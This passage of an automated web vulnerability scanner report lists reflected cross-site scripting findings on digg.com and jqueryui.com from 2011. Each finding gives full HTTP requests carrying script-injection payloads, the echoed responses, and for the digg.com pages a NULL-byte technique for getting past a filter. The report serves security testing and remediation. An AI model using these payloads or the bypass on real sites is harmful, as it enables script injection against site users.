The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d5183"><script>alert(1)</script>fbcd4c8b309 was submitted in the REST URL parameter 1. This input was echoed as d5183"><script>alert(1)</script>fbcd4c8b309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /login%00d5183"><script>alert(1)</script>fbcd4c8b309 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=217960 10.2.129.155
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18113

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/login%00d5183"><script>alert(1)</script>fbcd4c8b309.rss">
...[SNIP]...

2.20. http://digg.com/register [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c0388"><script>alert(1)</script>65b8dbc7903 was submitted in the REST URL parameter 1. This input was echoed as c0388"><script>alert(1)</script>65b8dbc7903 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /register%00c0388"><script>alert(1)</script>65b8dbc7903 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=275292 10.2.130.111
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18119

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/register%00c0388"><script>alert(1)</script>65b8dbc7903.rss">
...[SNIP]...

2.21. http://digg.com/search [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a216"><script>alert(1)</script>04c84f7943d was submitted in the REST URL parameter 1. This input was echoed as 5a216"><script>alert(1)</script>04c84f7943d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search%005a216"><script>alert(1)</script>04c84f7943d HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=205025 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18107

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%005a216"><script>alert(1)</script>04c84f7943d.rss">
...[SNIP]...

2.22. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034ebf"><script>alert(1)</script>07ed2e5f09b was submitted in the REST URL parameter 1. This input was echoed as 34ebf"><script>alert(1)</script>07ed2e5f09b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=281051 10.2.129.97
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18272

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx.rss">
...[SNIP]...

2.23. http://digg.com/topic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006361e"><script>alert(1)</script>13807bfb062 was submitted in the REST URL parameter 1. This input was echoed as 6361e"><script>alert(1)</script>13807bfb062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /topic%006361e"><script>alert(1)</script>13807bfb062 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=220732 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18112

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/topic%006361e"><script>alert(1)</script>13807bfb062.rss">
...[SNIP]...

2.24. http://digg.com/upcoming [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d52d9"><script>alert(1)</script>0f1d8b4e8f1 was submitted in the REST URL parameter 1. This input was echoed as d52d9"><script>alert(1)</script>0f1d8b4e8f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=193751 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18118

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1.rss">
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e92"><script>alert(1)</script>67aee4135f0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighligh
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62918"><script>alert(1)</script>0f9411eb6e5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0998"><script>alert(1)</script>a72e36b6181 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHo
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25c"><script>alert(1)</script>a29993d1aed was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverl
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca387"><script>alert(1)</script>d58ea5446de was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7fa2"><script>alert(1)</script>ef87dfaa078 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
